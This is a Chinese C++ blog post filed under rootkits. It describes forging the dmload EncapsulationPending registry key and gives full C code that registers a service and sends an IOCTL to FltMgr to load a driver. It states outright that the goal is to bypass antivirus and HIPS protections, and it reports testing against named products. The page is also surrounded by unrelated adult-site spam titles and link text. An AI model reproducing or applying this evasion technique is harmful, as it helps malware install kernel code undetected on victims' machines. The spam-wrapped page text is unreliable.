青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉(zhuǎn),開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

Load Driver

Posted on 2010-07-10 17:19 S.l.e!ep.¢% 閱讀(1077) 評論(0)  編輯 收藏 引用 所屬分類: RootKit

繞過主防加載驅(qū)動的新思路!!!

通過dmload.sys可以實現(xiàn)一種新型的驅(qū)動加載方式。
? 在dmload的二次驅(qū)動重初始化時會調(diào)用dmload!DmLoadIsEncapPending來判斷\Registry\Machine\System\CurrentControlSet\Services\dmload\EncapsulationPending子鍵是否存在,如果不存在則調(diào)用dmload!DmLoadIsDmioNeeded判斷系統(tǒng)是否需要加載dmboot驅(qū)動(向disk驅(qū)動發(fā)送IOCTL_DISK_GET_DRIVE_LAYOUT_EX查詢)。而如果存在EncapsulationPending鍵則直接跳過檢測步驟,直接調(diào)用ZwLoadDriver加載dmboot驅(qū)動。
? ? 因此,我們只要事先偽造一個EncapsulationPending子鍵,并用我們欲加載的驅(qū)動替換掉dmboot.sys(不替換亦可),重啟后便可成功加載驅(qū)動。


http://b.qzone.qq.com/cgi-bin/blognew/simpleqzone_blog_data?hostuin=95007909&r=0&idm=qzs.qq.com&bdm=b.qzone.qq.com&mdm=m.qzone.qq.com&blogid=1270802371&numperpage=15

一種另類驅(qū)動加載辦法

2010年04月09日 評論(0)|瀏覽(75) 點擊查看原文

一種另類驅(qū)動加載辦法

華中科技大學(xué)

在這個病毒=Rootkit的時代,驅(qū)動的加載無疑是重中之重,自然的,各種ARK以及Hips對驅(qū)動也是嚴(yán)加防范,比如ZwLoadDriver,ZwSetsystemInformation等等,這些API大多都被SSDT HOOK了,使用這些API會被攔截掉,從而使得驅(qū)動無法加載,不過,也有一些繞過的辦法。

微軟為windows專門設(shè)計了一套微過濾驅(qū)動(mini filters),這套驅(qū)動是專用于管理文件過濾驅(qū)動的加載和運行,很多的虛擬磁盤驅(qū)動,還有還原軟件常用的磁盤過濾驅(qū)動,都是使用微過濾驅(qū)動進(jìn)行加載的,而且一般殺毒軟件對這塊管的并沒有那么嚴(yán),所以可以從這里下手去加載。

不同于其他的驅(qū)動,Minifilter由一個獨立的manager管理而不僅僅是SCM(服務(wù)管理器),他的全稱叫Microsoft File System Filter Manager(想了解更多關(guān)于微處理管理器和微過濾驅(qū)動的內(nèi)容,可以到微軟官網(wǎng)查詢,http://www.microsoft.com/whdc/driver/filterdrv/default.mspx)。

加載驅(qū)動的主要代碼比較簡單

int main( int argc , char *argv[] )

{

HANDLE hDevice;

LOAD service_to_load;

BOOL err;

DWORD dwRet=0;

WCHAR drvPath[512];

memset( drvPath , 0 , 512 );

GetCurrentDirectoryW( MAX_PATH , drvPath );//將驅(qū)動放在當(dāng)前目錄下進(jìn)行加載

lstrcatW( drvPath , L"\\load.sys" );//驅(qū)動名稱必須為load.sys

make_reg( L"load" , drvPath );

hDevice = CreateFile ("\\\\.\\FltMgr" , GENERIC_READ | GENERIC_WRITE , FILE_SHARE_READ | FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL , NULL );//啟用Fltmgr進(jìn)行驅(qū)動的加載

if( hDevice == INVALID_HANDLE_VALUE )

{

printf("CreateFile failed with status : %d\n" , GetLastError() );//這個是錯誤處理

goto __end;

}

wcscpy( service_to_load.ServiceName , L"load");

service_to_load.Len = wcslen( service_to_load.ServiceName )*sizeof(WCHAR);

err = DeviceIoControl( hDevice , MAGIC_IOCTL , &service_to_load , sizeof(service_to_load) , NULL , 0 , &dwRet , NULL );//傳送控制碼

if( !err )

{

printf("sorry\n");

goto __end;

}

printf(":)\n");

__end:

CloseHandle( hDevice );

return 0;

}

這段代碼和SCM加載驅(qū)動的代碼基本一致,只不過換成了Fltmgr進(jìn)行加載。

驅(qū)動還需要在注冊表中進(jìn)行服務(wù)的注冊,不過這個注冊和SCM加載的方式一摸一樣,也不必多說了。

VOID WINAPI make_reg( LPWSTR szDriverName, LPWSTR szDriverPath )

{

DWORD dwType = SERVICE_KERNEL_DRIVER; //定義注冊類型為內(nèi)核驅(qū)動

DWORD dwStart = SERVICE_DEMAND_START; //手動啟動服務(wù)

HKEY hKey;

WCHAR szMain[512] = {0};

WCHAR szImgPath[512] = {0};

wchar_t szRegPath[512]={0};

wsprintfW( szMain,

L"%s%s",

L"SYSTEM\\CurrentControlSet\\Services\\",

szDriverName );//在service鍵值下注冊

wsprintfW( szImgPath,

L"%s%s",

L"\\??\\",

szDriverPath);

if( RegCreateKeyW( HKEY_LOCAL_MACHINE, szMain, &hKey ) == ERROR_SUCCESS )

{

RegSetValueExW( hKey,

L"DisplayName",

0,

REG_SZ,

(LPBYTE)szDriverName,

(DWORD)lstrlenW(szDriverName)*2);

RegSetValueExW( hKey,

L"ImagePath",

0,

REG_EXPAND_SZ,

(LPBYTE)szImgPath,

(DWORD)lstrlenW(szImgPath)*2);

RegSetValueExW( hKey,

L"Type",

0,

REG_DWORD,

(LPBYTE)&dwType,

(DWORD)sizeof(dwType) );

RegSetValueExW( hKey,

L"Start",

0,

REG_DWORD,

(LPBYTE)&dwStart,

(DWORD)sizeof(dwStart) );

}

}

這種方法經(jīng)過測試,可以過瑞星2010最新版,360過不了,其他的待測,網(wǎng)吧的驅(qū)動防火墻不知能不能過,也許可以嘗試下……

如果對驅(qū)動的加載方式以及原理不是特別了解,可以去參考Programming The Windows Driver Model。

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            99视频热这里只有精品免费| 亚洲久久在线| 麻豆精品视频在线观看视频| 欧美一级播放| 亚洲欧美资源在线| 久久精品av麻豆的观看方式| 欧美中文在线观看国产| 欧美中在线观看| 榴莲视频成人在线观看| 麻豆精品传媒视频| 欧美片在线观看| 欧美日韩亚洲在线| 国产精品欧美激情| 尤物视频一区二区| 亚洲黄色三级| 亚洲午夜久久久久久尤物| 亚洲视频一区二区| 老鸭窝91久久精品色噜噜导演| 久久久精品2019中文字幕神马| 久久久一区二区三区| 欧美好吊妞视频| 国产精品婷婷| 91久久精品国产91性色| 亚洲深夜激情| 久久久水蜜桃| 亚洲欧洲日本专区| 一区二区三区回区在观看免费视频| 99精品国产在热久久| 欧美一区三区二区在线观看| 牛牛国产精品| 国产欧美一区二区三区在线老狼 | 免费视频一区| 99精品视频免费观看| 欧美一区二区三区免费观看| 欧美日韩成人在线观看| 国产有码在线一区二区视频| 在线亚洲一区二区| 欧美mv日韩mv国产网站app| 亚洲深夜福利在线| 欧美精品一区二区久久婷婷| 国产三级欧美三级日产三级99| 亚洲激情国产| 久久久久欧美| 亚洲一区bb| 欧美日韩成人| 亚洲国产专区校园欧美| 久久成人免费日本黄色| 一区二区高清视频| 欧美激情久久久| 亚洲国产欧美精品| 美女国产精品| 久久精品人人做人人综合| 国产精品嫩草久久久久| 一区二区成人精品| 亚洲精品久久久久中文字幕欢迎你| 欧美在线看片| 国产在线观看一区| 欧美一级视频免费在线观看| 日韩一级不卡| 欧美日韩视频一区二区三区| 亚洲精品久久久久久久久久久久 | 久久精品视频99| 亚洲淫性视频| 国产精品一区在线播放| 亚洲欧美日韩在线高清直播| 亚洲免费观看高清完整版在线观看| 欧美不卡福利| 小黄鸭视频精品导航| 欧美电影打屁股sp| 亚洲风情在线资源站| 久久婷婷一区| 久久亚洲精品中文字幕冲田杏梨| 国产在线乱码一区二区三区| 欧美自拍偷拍| 久久精品一区中文字幕| 在线看片欧美| 最新亚洲一区| 国产精品高潮久久| 久久久久久黄| 欧美成人午夜激情在线| 亚洲影视九九影院在线观看| 亚洲一区一卡| 亚洲成人自拍视频| 夜夜爽av福利精品导航 | 欧美精品激情| 亚洲图片欧洲图片av| 午夜激情综合网| 亚洲黄色毛片| 亚洲欧美日韩国产一区二区三区| 韩国av一区二区三区在线观看| 欧美激情中文字幕在线| 国产精品美女久久久| 免费在线观看日韩欧美| 欧美午夜免费| 欧美不卡在线| 国产精品素人视频| 亚洲黄色一区二区三区| 国产欧美日韩亚洲精品| 亚洲国产精品成人| 国产日韩一区| 999亚洲国产精| 有码中文亚洲精品| 亚洲视频一区二区| 亚洲国产成人不卡| 亚洲一区二区视频在线观看| 国产日韩久久| 在线视频精品| 国语自产偷拍精品视频偷| 欧美风情在线| 国产精品国码视频| 亚洲伦理自拍| 狠狠色狠狠色综合日日小说 | 欧美激情精品久久久久| 欧美日韩成人网| 一区二区三区精品国产| 久久综合国产精品| 正在播放欧美一区| 性做久久久久久免费观看欧美| 在线播放日韩专区| 一本久久a久久免费精品不卡| 欧美在线欧美在线| 欧美在线一二三四区| 欧美黄免费看| 久久亚洲精品视频| 欧美日韩国产探花| 久久免费黄色| 国产午夜精品视频| 亚洲精品国产精品久久清纯直播| 亚洲精品人人| 日韩一级裸体免费视频| 午夜亚洲福利| 在线视频欧美日韩精品| 一区二区欧美在线| 在线中文字幕日韩| 久久久亚洲国产美女国产盗摄| 亚洲午夜在线| 欧美韩日视频| 欧美成人精品在线| 91久久香蕉国产日韩欧美9色| 亚洲欧美日韩久久精品| 日韩午夜视频在线观看| 欧美在线视频观看免费网站| 99视频一区二区| 西西人体一区二区| 亚洲自拍偷拍一区| 欧美精品一区三区| 欧美电影免费观看网站| 国产综合久久久久久| 久久久久久久一区二区| 久久精品99| 欧美刺激午夜性久久久久久久| 葵司免费一区二区三区四区五区| 欧美三级特黄| 亚洲国产精品一区| 亚洲高清在线视频| 久久久噜噜噜久久久| 久久er99精品| 国内精品久久国产| 久久精品国产久精国产爱| 久久黄金**| 国产自产2019最新不卡| 欧美国产成人精品| 欧美国产日韩亚洲一区| 精品av久久久久电影| 久久久蜜桃精品| 免费h精品视频在线播放| 一本大道久久a久久精二百| 欧美成人免费网站| 亚洲激情在线视频| 99视频一区二区| 国产精品久久久久久久午夜| 久久aⅴ国产紧身牛仔裤| 久久久亚洲国产美女国产盗摄| 国产欧美日韩综合一区在线播放| 亚洲欧美激情视频在线观看一区二区三区| 亚洲午夜激情| 欧美ab在线视频| 小黄鸭精品密入口导航| 久久婷婷国产综合精品青草 | 性亚洲最疯狂xxxx高清| 欧美在线一级va免费观看| 亚洲精选一区| 国产精品久久久久久久久免费樱桃 | 国产日韩欧美高清| 日韩视频一区二区| 亚洲自拍另类| 久久久久网址| 亚洲精品韩国| 久久躁日日躁aaaaxxxx| 亚洲国产经典视频| 欧美一级在线视频| 一区二区三区你懂的| 欧美激情小视频| 亚洲免费婷婷| 亚洲一二三区视频在线观看| 国产日韩欧美精品| 国产精品另类一区| 久久一区免费| 久久久久五月天| 欧美国产欧美综合|